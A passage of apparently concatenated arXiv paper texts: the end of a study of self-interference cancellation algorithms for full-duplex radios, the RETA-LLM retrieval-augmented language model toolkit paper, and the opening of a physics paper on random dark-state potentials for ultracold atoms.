combination of all previous and current input data, each weighted by their corresponding a priori errors. As a result, storing all past data requires increasing amounts of system memory, as shown in the block diagram of K-LMS in Fig. 2, making it impractical for real-time implementation. Traditionally, the kernel trick in RKHS has been used to implicitly map data into a feature space. However, recent developments have seen the adoption of random featured kernel (RFK) nonlinear maps that explicitly map input data to a finite low-dimensional Euclidean space. RFK enables the creation of kernel adaptive filters that use a fixed number of trainable parameters, making them hardware-friendly. One such algorithm, the RFK-LMS, was proposed in [13]. Although it uses a finite number of trainable parameters, the number required to accurately represent a non-linear function is generally unknown. Therefore, selecting an insufficient number of trainable parameters could lead to failure in accurately representing the unknown function. Despite its potential benefits, no digital SIC algorithm using RKF-LMS has been proposed in the context of full-duplex systems. We implemented this algorithm for digital SIC and compared its performance with the model-based methods, which will be discussed in Section V. ### _Deep Neural Networks with Adam Optimizer_ DNNs are highly flexible architectures that have shown great promise in modeling nonlinear SI channels with trainable parameters. This makes them an attractive alternative for modeling the nonlinear SI channel without any prior knowledge of the PA nonlinearity [12]. Notwithstanding this model-free approach, however, DNNs require an offline training procedure, meaning that their parameters need to be pre-trained before performing SIC. Moreover, they need to update the parameters of the DNN according to time-variations in the channel and the transmit data distribution. Unfortunately, implementing sample-by-sample updates of the DNN parameters can be challenging, which limits the applicability of adaptive nonlinear filters with sequential inputs. Therefore, although DNNs are a powerful tool for modeling the SI channel, addressing their offline training requirement and limited applicability in time-varying and non-stationary transmit data scenarios is crucial to fully leverage their potential in practical systems. In a recent study [10], a promising approach that combines DNNs and the adaptive method was proposed. This approach uses DNNs to model the nonlinear distortion introduced by the PA, while the linear channel estimator helps to track channel variations. More specifically, the approach uses not only the transmit data but also the estimated linear channel information as the input of the network to track the channel variation. However, a common drawback of DNN-based SIC algorithms is their huge complexity of the offline training process. In such cases, the DNN parameters need to be trained by numerous cases to incorporate the variations in the channel, which hinders the practical real-time full-duplex radio implementation under the non-stationary scenario. ## IV Performance Evaluation In this section, we provide a SIC performance comparison for model-based and model-free algorithms discussed in Sections II and III. From the comparison, we provide a discussion on the existing digital SIC algorithms by capitalizing on important implementation aspects, including model complexity, training complexity, convergence speed, SIC performance, channel adaptation, and the non-stationary distribution of transmit signals like in Table I. ### _Simulation Setups_ In our simulations, the transmitter considers both OFDM and SC transmissions with quadrature amplitude modulation (QAM) symbols. A transmit power is set to 20 dBm, while the received SI signal power after the analog SIC is assumed to be about -50 dBm, and the noise power is -90 dBm. The nonlinearity of the system is designed using the PA modeling, as described in [14]. To demonstrate the efficacy of robustness in dealing with variations in the channel and transmit data distributions, we conducted an experiment where a transmitter sent the first 4400 symbols using OFDM, followed by transmitting 1024-QAM symbols for the remaining duration. The channel varies every 2200 symbols. ### _Complexity Comparison_ * **WH-LMS**[1]: The model complexity is measured by the number of filter coefficients used in LMS algorithms. In our WH-LMS implementation, Within the realm of model-based algorithms, three concurrent FIR filters are employed, specifically utilizing a 5th order model, each Fig. 4: A snapshot of the real-time implementation testbed with the NI-PXI SDR platform. Fig. 3: The residual SI power comparison according to the various SIC methods. with a length of 21 coefficients. Consequently, the calculated model complexity for this algorithm amounts to 63 coefficients. * **WH-RLS**[8]: The WH-RLS algorithm stores the input of the 3 parallel filters for each symbol input and calculates the sample covariance. Then, the eigen-decomposition of the sample covariance is harnessed for the input orthogonalization. Therefore, the model complexity of the WH-RLS algorithm is equivalent to that of the WH-LMS algorithm, but additional computations are required in each iteration compared to the WH-LMS algorithm. * **WIH-LMS**[9]: The WIH-LMS algorithm assumes the complex Gaussian input. As no additional computations are required for the input orthogonalization, the WIH-LMS algorithm operates with the same model complexity as the WH-LMS algorithm. * **AOP-LMS**[15]: The AOP-LMS algorithm stores the input in the same manner as the WH-RLS algorithm, but it doesn't require the eigen-decomposition for input orthogonalization. Thanks to the low-complexity Gram-Schmidt-based input orthogonalization, the additional computation complexity was reduced compared to the WH-RLS algorithm. * **K-LMS**[13]: The number of filter coefficients to be estimated within the kernel-based algorithm corresponds directly to the count of kernels employed. Given that the K-LMS algorithm evaluates the latest input against all historical inputs through a Gaussian kernel function, its operation encompasses a total of 8800 kernels. Consequently, the K-LMS algorithm exhibits a model complexity amounting to 8800. Moreover, as new inputs emanate from the kernel function, drawing upon both preceding and current data, the process necessitates supplementary computations and memory resources to generate these novel inputs. * **RFK-LMS**[13]: Rather than comparing the new input with previous inputs, the RFK-LMS employs a distinctive approach, evaluating them against a predetermined collection of randomly generated data through a Gaussian kernel function. With a dataset comprising a size of 500, the RFK-LMS algorithm's model complexity becomes inherently associated with this quantity. * **DNN with Adam optimizer**[12]: Due to the model-based algorithm's filter length being set at 21, the DNN established an equivalent input node count of 21 to ensure a balanced comparison. When interfacing with the real-number-focused Adam optimizer, this count doubled to 42. The architecture comprises a solitary hidden layer boasting a depth of 1, housing a substantial 200 nodes within. The task involves the estimation of a total of 9002 coefficients, encompassing 8800 weights and 202 biases, thus culminating in a DNN model complexity of 9002. This intricately designed network underwent training over the course of 30000 epochs, employing a diverse training dataset of 2200 instances generated at random. * **Adaptive DNN with Adam optimizer**[10]: To enhance adaptability within the Deep Neural Network (DNN), we integrate channel values into the network's input dataset. Consequently, the DNN's input encompasses both the input data and its corresponding channel pair, resulting in a total of 84 input nodes. Recognizing the heightened diversity in inputs, we augment the number of hidden nodes to 300. The adaptive DNN's model complexity is quantified at 26,102 parameters, comprising 25,800 weights and 302 biases. Through a training process spanning 40,000 epochs, we fine-tune this network using a training dataset of 8,800 instances, randomly generated for comprehensive coverage. ### _Performance Comparison_ Fig. 3 clearly illustrates the limitations of model-free approaches in canceling nonlinear SI signals. The kernel-based algorithms exhibit a subpar attenuation of approximately -10 dB to -20 dB. The DNN-aided SIC technique shows good SIC performance, but it cannot track the channel varying. Even though the adaptive DNN-aided SIC technique employing the Adam optimizer showcases the effective SIC among the Fig. 5: Scattering plots and power spectral density of received and the residual SI signals after performing SIC. model-free frameworks, its SIC performance was inferior to the mode-based algorithms and it carries a significantly higher complexity and offline training process. Conversely, the WH-LMS algorithm achieves an impressive attenuation of over -35 dB due to its ability to match the nonlinear PA model. However, it suffers from a slow convergence rate. To address this issue, the WH-RLS, WIH-LMS, and AOP-LMS algorithms incorporate orthogonalization gains in their basis functions, resulting in a rapid convergence rate and achieving noise-level SIC power within approximately 2000 iterations. While the WIH-LMS algorithm exhibits a slightly slower convergence rate due to a distribution mismatch between the Gaussian signal and the OFDM modulated signal, its low complexity remains acceptable. Among the algorithms, only the AOP-LMS algorithm maintains noise-level SIC even after variations in the input distribution. Notably, the AOP-LMS algorithm stands out as it attains optimal SIC power, nearly optimal convergence rate, and robustness to channel and input distribution variations in a full-duplex system, all while maintaining reasonable computational complexity. Therefore, it is prudent to leverage model-based approaches when prior knowledge of the system model is available and the model mismatch effect is not pronounced, as model-free approaches may not yield favorable outcomes in such scenarios. ## V Real-Time Implementation We implemented a full-duplex testbed, adhering to the IEEE 802.11a standard. The implementation operates at a center frequency of 2.4 GHz, with a system bandwidth of 10 MHz. The transmit symbols are generated using an OFDM waveform. For this testbed, both the transmitter and receiver are equipped with omni-directional single antennas, while the noise floor level at the baseband of the system is approximately -100 dBm. In this testbed, we implemented the model-based algorithms for SIC without knowing any true PA model to validate the effect of the model-based approach when the PA modeling error exists. For more information on the experimental results, we refer to our website _[https://wireless-x.korea.ac.kr/full-duplex-radios_](https://wireless-x.korea.ac.kr/full-duplex-radios_). Fig. 5 presents a snapshot of the received SI signal power and the corresponding power spectrum density (PSD) for the model-based SIC algorithms. The results clearly demonstrate that the WIH-LMS and AOP-LMS algorithms outperform the WH-LMS algorithm due to their superior model selection that incorporates orthogonality. In such a scenario, we can observe that the WH-LMS algorithm fails to converge adequately while the WIH-LMS and AOP-LMS converge. It is important to note that the AOP-LMS algorithm aligns with the WIH-LMS algorithm when the transmit signal follows a complex Gaussian distribution, such as in the case of OFDM signaling. Our implementation results indicate that both the AOP-LMS and WIH-LMS algorithms can be practical solutions that exhibit the best convergence performance in SIC even when the PA model is unknown. ## VI Conclusion and Discussion This article provided a comparison of state-of-the-art digital SIC algorithms for full-duplex radios by focusing advantages and disadvantages of model-based and data-driven approaches. By conducting a thorough comparative study, we highlighted the numerous benefits associated with adopting a model-based approach for SIC algorithms in full-duplex systems. Utilizing prior knowledge of the system model, a model-based approach demonstrated superior SIC performance while effectively optimizing implementation costs, especially when considering practical scenarios with minimal model mismatch effects. However, in cases where modeling errors are prominent, the data-driven approach emerges as a more favorable option compared to model-based methods. Employing DNNs, the data-driven approach can be an effective strategy for implementing SIC algorithms in full-duplex radios. To further enhance the advancements in data-driven SIC techniques, particularly in the context of time-varying full-duplex radio systems, the integration of few-shot learning or online learning algorithms can play a pivotal role. These techniques pave the way for the development of more generalized full-duplex communication in future wireless systems.
2306.05212
RETA-LLM: A Retrieval-Augmented Large Language Model Toolkit
Although Large Language Models (LLMs) have demonstrated extraordinary capabilities in many domains, they still have a tendency to hallucinate and generate fictitious responses to user requests. This problem can be alleviated by augmenting LLMs with information retrieval (IR) systems (also known as retrieval-augmented LLMs). Applying this strategy, LLMs can generate more factual texts in response to user input according to the relevant content retrieved by IR systems from external corpora as references. In addition, by incorporating external knowledge, retrieval-augmented LLMs can answer in-domain questions that cannot be answered by solely relying on the world knowledge stored in parameters. To support research in this area and facilitate the development of retrieval-augmented LLM systems, we develop RETA-LLM, a {RET}reival-{A}ugmented LLM toolkit. In RETA-LLM, we create a complete pipeline to help researchers and users build their customized in-domain LLM-based systems. Compared with previous retrieval-augmented LLM systems, RETA-LLM provides more plug-and-play modules to support better interaction between IR systems and LLMs, including {request rewriting, document retrieval, passage extraction, answer generation, and fact checking} modules. Our toolkit is publicly available at https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM.
Jiongnan Liu, Jiajie Jin, Zihan Wang, Jiehan Cheng, Zhicheng Dou, Ji-Rong Wen
2023-06-08T14:10:54Z
http://arxiv.org/abs/2306.05212v1
# RETA-LLM: A Retrieval-Augmented Large Language Model Toolkit ###### Abstract Although Large Language Models (LLMs) have demonstrated extraordinary capabilities in many domains, they still have a tendency to hallucinate and generate fictitious responses to user requests. This problem can be alleviated by augmenting LLMs with information retrieval (IR) systems (also known as retrieval-augmented LLMs). Applying this strategy, LLMs can generate more factual texts in response to user input according to the relevant content retrieved by IR systems from external corpora as references. In addition, by incorporating external knowledge, retrieval-augmented LLMs can answer in-domain questions that cannot be answered by solely relying on the world knowledge stored in parameters. To support research in this area and facilitate the development of retrieval-augmented LLM systems, we develop RETA-LLM, a RETreival-Augmented LLM toolkit. In RETA-LLM, we create a complete pipeline to help researchers and users build their customized in-domain LLM-based systems. Compared with previous retrieval-augmented LLM systems, RETA-LLM provides more plug-and-play modules to support better interaction between IR systems and LLMs, including request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules. Our toolkit is publicly available at [https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM](https://github.com/RUC-GSAI/YuLan-IR/tree/main/RETA-LLM). ## 1 Introduction Large language models (LLMs) have attracted increasing attention from both research community and industry Brown et al. (2020); OpenAI (2023); Ouyang et al. (2022); Touvron et al. (2023); Chowdhery et al. (2022); Zhao et al. (2023); Zeng et al. (2022). With tremendous world knowledge stored in parameters Petroni et al. (2019); Roberts et al. (2020); Jiang et al. (2020) and the Reinforcement Learning from Human Feedback (RLHF) techniques Christiano et al. (2017); Ziegler et al. (2019), LLMs can generate helpful, detailed, and polite texts in response to user inputs. Many studies have demonstrated LLMs' extraordinary abilities in various areas, including nature language processing Moslem et al. (2023), information retrieval Sun et al. (2023); Wang et al. (2023); Mao et al. (2023), and recommendation Hou et al. (2023); Zhang et al. (2023). However, LLMs still tend to hallucinate and sometimes generate texts opposite to facts Zhou et al. (2021); Zhao et al. (2023). To tackle these problems, researchers have proposed a new paradigm to strengthen LLMs with information retrieval systems (retrieval-augmented LLMs) Shi et al. (2023); Jiang et al. (2023); Nakano et al. (2022), which enables LLMs to retrieve relevant contents from an external repository (knowledge corpus) to generate texts based on them. It has been verified that retrieval-augmented LLMs can generate texts in response to user input with fewer hallucinations Nakano et al. (2022). Furthermore, by incorporating customized private data resources, retrieval-augmented LLMs can respond to in-domain queries that cannot be answered by LLMs trained with public data. To support research in this area and help users build their own in-domain LLM-based systems, we devise RETA-LLM, a **RET**reival-**A**ugmented LLM toolkit. Different from previous general LLM-enhanced toolkits such as LangChain,1 RETA-LLM focuses on the retrieval-augmented LLMs and provides more plug-in modules. Typically, retrieval-augmented LLMs use a retrieve-and-generate strategy with two modules: First, they retrieve documents or passages based on user request (**document retrieval** module); then, they generate answers utilizing these relevant documents as references (**answer generation** module). In addi tion to these two basic modules, our RETA-LLM provides three optional modules: (1) a **request rewriting** module to make user's current request more complete and clear; (2) a **passage extraction** module to extract relevant passages or fragments from the whole retrieved document contents; and (3) a **fact checking** module to verify whether there exist factual errors in the generated answers. These optional modules can make the interaction between IR systems and LLMs more effective and smooth. The disentanglement between LLMs and IR systems in our RETA-LLM is more thorough, which makes the customization of search engines and LLMs more convenient. Furthermore, to make the usage easier, we provide a complete and ready-to-use pipeline for researchers and users to build their RETA-LLM toolkits based on their own repository for in-domain LLM-based systems from scratch. RETA-LLM is part of YuLan, a open source LLM initiative proposed by Gaoling School of Artificial Intelligence, Renmin University of China. RETA-LLM is still under development and there are many issues that need to be solved with great efforts. We sincerely welcome contributions on this open source toolkit. ## 2 RETA-LLM Framework As aforementioned, compared with Langchain, which is a common LLM-augmented toolkit, our RETA-LLM toolkit focuses specifically on retrieval-augmented LLMs. We provide five plug-in modules in RETA-LLM to interact with LLMs and IR systems. The modules include request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules. The framework of our RETA-LLM is shown in Figure 1. The workflow of RETA-LLM is as follows: First, RETA-LLM uses the request rewriting module to revise the current user request to make it complete and clear. Because users can issue a series of questions to the RETA-LLM, the semantics of the current user request may be incomplete. For example, A user may ask _"How about the School of Economics?"_ while the historical request is _"Introduce the majors in School of Information"_. In this case, the precise meaning of the user is _"Introduce the majors in School of Economics"_. Since LLMs have shown remarkable abilities in rewriting queries in conversational dense retrieval [20], we feed the current user request and the previous conversation histories to LLMs to perform rewriting. Figure 1: The RETA-LLM framework. Examples are taken from an intelligent university information seeking system powered by RETA-LLM. Then, RETA-LLM uses the document retrieval module to retrieve relevant documents from the external corpus based on the revised user request. The document retrieval module is the module connected to the IR system. It retrieves relevant documents from the external knowledge corpus and returns top-\(K\) of them. The \(K\) is set to 3 in our default configuration. We provide a default dense retriever in our repository. The detailed description can be found in the next section. Next, RETA-LLM uses the passage extraction module to extract fragments related to the user request from the retrieved documents to form the references. Because of the input length limitations (typically 2048 or 4096 tokens) of LLMs, it is impossible to directly concatenate the contents of all top-\(K\) relevant document contents as references for them to generate answers. Trivial methods by truncating the document contents may lose important information in them. Therefore, we reuse the LLMs themselves to extract related fragments from retrieved documents based on the revised request. Since the length of one document may also exceed the limitations, we apply the sliding window strategy to extract fragments step by step. The sliding window size and step are set to 512 and 256 in our default configuration. These fragments are then concatenated together as the references. Besides, RETA-LLM uses the answer generation module to generate answers for the user request. As previous researches (Nakano et al., 2022; Shi et al., 2023; Jiang et al., 2023) suggest, by feeding the references retrieved from the external corpus, LLMs can generate more factual answers. Finally, RETA-LLM uses the fact checking module to verify whether the generated answers contain factual mistakes and output final responses for the user request. Though providing additional evidence for generation, LLMs may also hallucinate (Nakano et al., 2022). It is necessary to devise a module to conduct further fact verification. Because of the strong natural language understanding abilities of LLMs, we feed the references and generated answers to them to make judgments. Therefore, RETA-LLM can decide whether to output the generated answers or just say "_I cannot answer this question_". Noticed that all the inputs to the LLMs are wrapped in instructions or prompts. As shown in Figure 1, we disentangle the IR systems and LLMs entirely in our RETA-LLM. This separate design in our RETA-LLM leads users can customize their personal search engines and LLMs. ## 3 RETA-LLM Usage Pipeline To make the toolkit more convenient for personal usage, we provide a complete pipeline to build in-domain LLM-based system based on html resources. The pipeline is as follows: First, RETA-LLM uses Beautiful Soup package to convert the raw html files into json data in our **HTML Converter**.2 Footnote 2: Beautiful Soup, [https://beautiful-soup-4.readthedocs.io/en/latest/](https://beautiful-soup-4.readthedocs.io/en/latest/) Second, RETA-LLM follows the implementation of disentangled-retriever(Zhan et al., 2022) to build dense indexes and to conduct domain adaption from the converted json data in our **Index Builder**.3 Specifically, our method supports unsupervised training of dense retrieval models on local document collections, enabling the model to learn domain-specific knowledge in advance. Compared with the retrieval module in the popular LangChain library, our retrieval method has two advantages: (1) the model learns knowledge within the domain of local documents, enabling it to match queries more accurately, and (2) our method does not segment text, thus avoiding any negative impact on the overall semantic information of the text. We also provide a sparse retriever applying faiss(Johnson et al., 2019) package to build sparse indexes.4 Otherwise, users can also use their customized search engines as the document retrieval module. Footnote 3: disentangled-retriever, [https://github.com/jingtaozhan/disentangled-retriever](https://github.com/jingtaozhan/disentangled-retriever) Third, users need to prepare LLMs for question answering. For LLM loading and responding, we provide the template for Alpaca (Taori et al., 2023),5, YuLan-Chat,6 ChatGLM (Zeng et al., 2022; Du et al., 2022),7 and GPT-3.5 API (Ouyang et al., 2022).8 If users use other LLMs, they can edit the codes and configurations in our toolkit. Footnote 4: Faiss, [https://github.com/facebookresearch/faiss](https://github.com/facebookresearch/faiss) Footnote 5: Alpaca,[https://github.com/tatsu-lab/stanford_alpaca](https://github.com/tatsu-lab/stanford_alpaca) Footnote 6: YuLan-Chat, [https://github.com/RUC-GSAI/YuLan-Chat](https://github.com/RUC-GSAI/YuLan-Chat) Footnote 7: ChatGLM, [https://github.com/THUDM/ChatGLM-6B](https://github.com/THUDM/ChatGLM-6B) Footnote 8: OpenAI’s API, [https://api.openai.com/v1/completions](https://api.openai.com/v1/completions) Footnote 9: StreamInit, [https://github.com/streamInit/streamInit](https://github.com/streamInit/streamInit) Finally, users can start their own RETA-LLM services using streamlit package.9 More details about the usage pipeline can be found on our GitHub repository. ## 4 A RETA-LLM Service Case Based on the RETA-LLM and the usage pipeline, we use the web pages on Renmin University of China's enrollment online platform, 10 to build an RUC-enrollment-assistant system. The system uses a dense document retrieval module and adopts YuLan-13B as the backbone LLM. A using case is shown in 2. By enhancing the IR systems, LLMs can answer in-domain questions which cannot be answered by their own knowledge. Footnote 10: Renmin University of China’s enrollment online platform, [https://rdzs.ruc.edu.cn](https://rdzs.ruc.edu.cn) ## 5 Conclusion and Future Work In this paper, we propose RETA-LLM to facilitate research and development of retrieval-augmented LLMs. We provide five independent modules: request rewriting, document retrieval, passage extraction, answer generation, and fact checking modules in our toolkit. Furthermore, we provide a pipeline to help users build their in-domain LLM-based systems. In the future, we are going to include more retrieval-augmented LLM strategies such as active retrieval augmented generation Jiang et al. (2023). Besides, we plan to make RETA-LLM more modularized and configurable.
2307.12447
Random Kronig-Penney-type potentials for ultracold atoms using dark states
A construction of a quasi-random potential for cold atoms using dark states emerging in $\Lambda$ {level configuration} is proposed. Speckle laser fields are used as a source of randomness. Anderson localisation in such potentials is studied and compared with the known results for the speckle potential itself. It is found out that the localisation length is greatly decreased due to the non-linear fashion in which dark-state potential is obtained. In effect, random dark state potentials resemble those occurring in random Kronig-Penney-type Hamiltonians.
Mateusz Łącki, Jakub Zakrzewski
2023-07-23T22:28:12Z
http://arxiv.org/abs/2307.12447v2
# Random Kronig-Penney-type potentials for ultracold atoms using dark states ###### Abstract A construction of a quasi-random potential for cold atoms using dark states emerging in \(\Lambda\) level configuration is proposed. Speckle laser fields are used as a source of randomness. Anderson localisation in such potentials is studied and compared with the known results for the speckle potential itself. It is found out that the localisation length is greatly decreased due to the non-linear fashion in which dark-state potential is obtained. In effect, random dark state potentials resemble those occurring in random Kronig-Penney-type Hamiltonians. ## I Introduction A particle moving in the potential consisting of narrow peaks may be described by Kronig-Penney-type Hamiltonians [1]. When the potential is periodic, the problem is solved by a simple Bloch approach. The presence of disorder enriches the physics. Here one can imagine that periodicity is broken either by different potential amplitudes at periodically distributed sites - the case sometimes called a compositional disorder [2] or by random position of scatterers having then structural (or positional) disorder. In both cases one typically expects Anderson localization [3] at all energies for one-dimensional (1D) system and uncorrelated disorder. The presence of correlations leads to mobility edges as predicted and verified experimentally for a number of models [4; 2; 5; 6; 7; 8; 9; 10; 11; 12; 13]. A standard way to implement potentials for ultracold atoms is to use off-resonant laser standing waves via an AC Stark effect [14]. Such light-shift potentials enabled experiments typical for condensed matter systems as manifested by e.g. the pioneering observation of Mott insulator to superfluid quantum phase transition [15]. Later research in optical lattice potentials involved the use of different atomic species that feature strong, long range interactions [16; 17; 18], creation of topological insulators [19] or studies of non-equilibrium dynamics [20]. In particular, the 1D experiments with ultracold atoms in random potentials have been conducted with the far off-resonant speckle potential [21], bichromatic fields [22] or digital mirror devices [23]. The AC Stark based approach leads, naturally, to diffraction-limitations that prohibit creating potentials with features much sharper than half of the laser wavelength. To remedy that, a construction based on ultracold atoms in many-levels coupling schemes [24; 25] was proposed. Coherent population of a dark state in the three-levels \(\Lambda\) configuration was used to create a periodic comb potential consisting of subwavelength peaks [26]. Involving more than three atomic levels [27; 28] opens possibilities for more complex potentials [29; 30]. In this work we shall use a similar \(\Lambda\) scheme to create random correlated potentials with sharp features overcoming the diffraction limit. The random dark state potential consists of very narrow peaks as described in Section II. The shapes of the potential peaks are quantitatively analized in Section III, where we discuss also basic statistical properties of this potential. The dark state potential may consist of short random peaks. In this configuration we consider Anderson localization in Section IV, linking the localization length \(L_{\mathrm{loc}}\) to the correlations functions of the potential. There we also make a comparison with the approximation of the potential by properly placed Dirac-delta scatterers realising a random Kronig-Penney model. Using appropriate laser configuration, there exist also a second possibility of preparing the dark state potential as consisting of sharp tall peaks of a (quasi)random height. The motion in this potential is described in the tight-binding approach in Section V. ## II The model We consider a gas of ultracold atoms of mass \(m\) confined to a 1D tube along the \(x\) axis by a tight transverse harmonic confinement in \(y,z\) realised by the potential \(V(x,y,z)=m\omega_{\perp}^{2}(y^{2}+z^{2})/2\). The \(\hbar\omega_{\perp}\) is assumed to be sufficiently large for excited transverse modes to remain unpopulated. The gas is non-interacting, which can be ensured by tuning of the scattering length via a Feshbach resonance, or by using a fermionic atom species, where \(s\)-wave contact interactions are suppressed. We assume no confinement along the \(x\) direction, but in real experiment one would use either harmonic confinement or sheet light implementing hard-wall boundary condition [31]. The atoms are driven by resonant laser light coupling three atomic (sub)levels in the \(\Lambda\) configuration as shown in Fig. 1. The Hamiltonian of the model takes the form \[H =- \frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+H_{a}, \tag{1}\] \[H_{a} = \frac{\hbar}{2}\left(\begin{array}{ccc}0&0&\Omega_{1}^{*}(x)\\ 0&0&\Omega_{2}^{*}(x)\\ \Omega_{1}(x)&\Omega_{2}(x)&-i\Gamma_{e}\end{array}\right).\] The Rabi frequencies \(\Omega_{i}\), \(i=1,2\) describe laser driving of the corresponding transitions between basis states \(|i\rangle\) and \(|3\rangle\). The \(\Gamma_{e}\) denotes the spontaneous emission decay rate of the upper state in the \(\Lambda\) scheme. The fields \(\Omega_{i}(x)\) can be due to a laser standing wave or a speckle field as discussed later on. The "atomic" part of the Hamiltonian, \(H_{a}\) for each \(x\in\mathbb{R}\) has a zero eigenvalue with associated "dark state" eigenvector: \[|D(x)\rangle\!=\!\frac{-\Omega_{2}(x)|1\rangle\!+\!\Omega_{1}(x)|2\rangle}{ \sqrt{|\Omega_{1}(x)|^{2}\!+\!|\Omega_{2}(x)|^{2}}}\!=\!\cos\alpha_{x}|2 \rangle\!-\!\sin\alpha_{x}|1\rangle. \tag{2}\] The remaining eigenvectors \(|B_{j}(x)\rangle,j=1,2\) are called bright states since they have a nonzero contribution from the excited state \(|3\rangle\). When \(\Gamma_{e}\neq 0\) the matrix \(H_{a}\) is non-Hermitian and the set of right eigenvectors \(\mathcal{B}=\{|D(x)\rangle,|B_{1}(x)\rangle,|B_{2}(x)\rangle\}\) has the associated "ket" states \(\langle D(x)|,\langle B_{j}(x)|\) that complete the biorthonormal system. The latter are always meant as proper "left" eigenvectors, and in general \(\langle B_{i}(x)|\neq|B_{i}(x)\rangle^{\dagger}\). The bright state energies are: \[E_{j}(x)=\frac{\hbar}{4}\left(-i\Gamma+(-1)^{j}\sqrt{-\Gamma_{e}^{2}+4|\Omega _{1}(x)|^{2}+4|\Omega_{2}(x)|^{2}}\right). \tag{3}\] The gap to bright states is non-zero if both \(\Omega_{1}(x),\Omega_{2}(x)\) do not vanish at some \(x\). This can be ensured e.g. when one of \(\Omega_{1}(x)\) is position-independent and non-zero. When expressed in the position-dependent basis \(\mathcal{B}\), defined above, the Hamiltonian (1) takes the form (see [29; 30; 32]): \[H = \frac{1}{2m}(p-A)^{2}+\sum_{i=1}^{2}E_{j}(x)|B_{j}\rangle\langle B_{j}| \tag{4}\] with \(A_{ij}=-i\hbar\langle\mathcal{B}_{i}|\partial_{x}|\mathcal{B}_{j}\rangle.\) One can always choose the local phases of basis vectors \(|1\rangle,\ldots,|3\rangle\) such that \(\Omega_{i}(x)\) are real. Then, after projection onto \(|D(x)\rangle\) state the Hamiltonian (1) reduces to the form: \[H = -\frac{\hbar^{2}}{2m}\frac{d^{2}}{dx^{2}}+V_{D}(x), \tag{5}\] where \[V_{D}(x) = -\frac{\hbar^{2}}{2m}\langle D(x)|\partial_{xx}|D(x)\rangle, \tag{6}\] is the dark state potential. Using Eq. (2) one obtains: \[V_{D}(x)=\frac{\hbar^{2}}{2m}\frac{(\Omega_{1}^{\prime}(x)\Omega_{2}(x)- \Omega_{1}(x)\Omega_{2}^{\prime}(x))^{2}}{(\Omega_{1}^{2}(x)+\Omega_{2}^{2}(x) )^{2}}=\frac{\hbar^{2}}{2m}(\alpha_{x}^{\prime})^{2}. \tag{7}\] Under the condition \[|E_{j}(x)| \gg |A_{kl}(x)|,\quad j\in\{1,2\},\ k\neq l, \tag{8}\] valid for sufficiently large \(\Omega_{i}\)[24; 33], the dark state is only very weakly depopulated. The Rabi frequencies.-The Rabi frequencies in the Hamiltonian (1) considered in this work are due to a standing/running laser wave or a speckle field. In the former case they are of the form: \[\Omega_{i}(x)=\tilde{\Omega}_{i}\sin(k_{i}x+\phi)+\tilde{\Omega}_{i}^{0}. \tag{9}\] The \(k_{i}=2\pi/\lambda_{i}\) and \(\lambda_{i}\) is the wavelength of the laser implementing \(\Omega_{i}(x)\). The value of \(k_{i}\) in Eq. (9) may be also (smoothly) controlled if the lasers creating the standing wave propagate at a finite angle with respect to \(\hat{x}\). The intensity of the lasers controls the amplitude \(\tilde{\Omega}_{i}\). Implementation of the term \(\tilde{\Omega}_{i}^{0}\) requires phase coherent projection of a running wave in the direction perpendicular to the \(\hat{x}\) axis (see [34]). The wave number \(k_{1}\) defines the recoil energy: \[E_{r}=\frac{\hbar^{2}k_{1}^{2}}{2m}. \tag{10}\] in this work we always use the recoil energy defined with respect to \(k_{1}\). Thus \(E_{r}\) carries no index "\(i\)". The potential \(V_{D}(x)\) is randomized by using random Rabi frequency \(\Omega_{i}(x)\). That may be accomplished by driving the corresponding transition with a quasi-random electric field in the form of the speckle field created by focusing the laser beam reflected from a diffusive plate. The complex amplitude of the electric field along the system is then given by the formula [35]: \[F(x)\sim\frac{e^{i\frac{2\pi l}{\lambda}}}{i\lambda f}e^{i\frac{\pi}{\lambda f} x^{2}}\int_{-R/2}^{R/2}d\rho\mu(\rho)w(\rho)e^{i\frac{\pi}{\lambda f}\rho^{2}}e^{-i \frac{2\pi}{\lambda f}\pi\rho}, \tag{11}\] Figure 1: The \(\Lambda\) level configuration considered in this work. The states \(|1\rangle,|2\rangle\), are assumed to be the ground state sublevels while \(|3\rangle\) is the excited state with the spontaneous emission rate \(\Gamma_{e}\). The Rabi frequencies \(\Omega_{i}(x)\) may be due to laser standing waves or a speckle field and are typically position dependent. with \(\lambda\) being the laser wavelength, \(f\) - the focal distance of the used lens and \(R\) indicating the size of the diffusive plate. Here we skip the index \(i\). The \(\mu(\cdot)\) are random complex phases imprinted by the diffusive surface. They are assumed to be completely random phase factors with a homogeneous probability density over a unit circle. The above formula is valid in the paraxial approximation, namely \(f\gg R\). The ratio \(R/f\) determines the degree to which the laser field is focused. This ratio controls the effective length scale of \(F(x)\) (11). Specifically \[\sigma_{R} = \frac{\lambda f}{\pi R},\] is the correlation length for the speckle potential, a convenient length unit for the speckle field. In this work even if several speckle fields are used simultaneously in some laser configuration, it is assumed, for simplicity, that they have the same \(\sigma_{R}\). We then define \[E_{\sigma_{R}}=\frac{\hbar^{2}}{2m\sigma_{R}^{2}}, \tag{12}\] as a characteristic speckle energy scale. It is interesting to compare the above expression to the recoil energy for a laser with same wavelength. It is \[E_{r}=(2f/R)^{2}E_{\sigma_{R}}, \tag{13}\] which for the assumed in this work ratio \(R/f=1/3\), leads to \(E_{r}=36E_{\sigma_{R}}\). The field \(F(x)\) generates a Rabi frequency \(\Omega_{i}(x)\) which may be for convenience expressed as a product of its mean value \(\tilde{\Omega}_{i}\) and the dimensionless function \(S_{i}(x)\): \[\Omega_{i}(x)=\tilde{\Omega}_{i}S_{i}(x), \tag{14}\] where \(\frac{1}{L}\int_{0}^{L}|S(x)|dx\to 1\) as \(L\to\infty\). The \(\Omega_{i}\) as above is non-zero, but it takes arbitrary small value with a finite probability. To overcome this problem (recall small \(\Omega_{i}\) may be harmful to our \(\Lambda\) scheme properties) one can add a phase coherent laser field which leads to: \[\Omega_{i}(x)=\tilde{\Omega}_{i}S_{i}(x)+\tilde{\Omega}_{i}^{0}, \tag{15}\] where both \(\tilde{\Omega}_{i}^{0},\tilde{\Omega}_{i}\) are independently controlled by intensity of the respective laser field. Again, without a loss of generality \(S_{i}(x),\tilde{\Omega}_{i}^{0},\tilde{\Omega}_{i}\in\mathbb{R}\). The Speckle potential.-The speckle laser field can be used to create an optical speckle potential via the AC Start shift in the two level system. The speckle laser 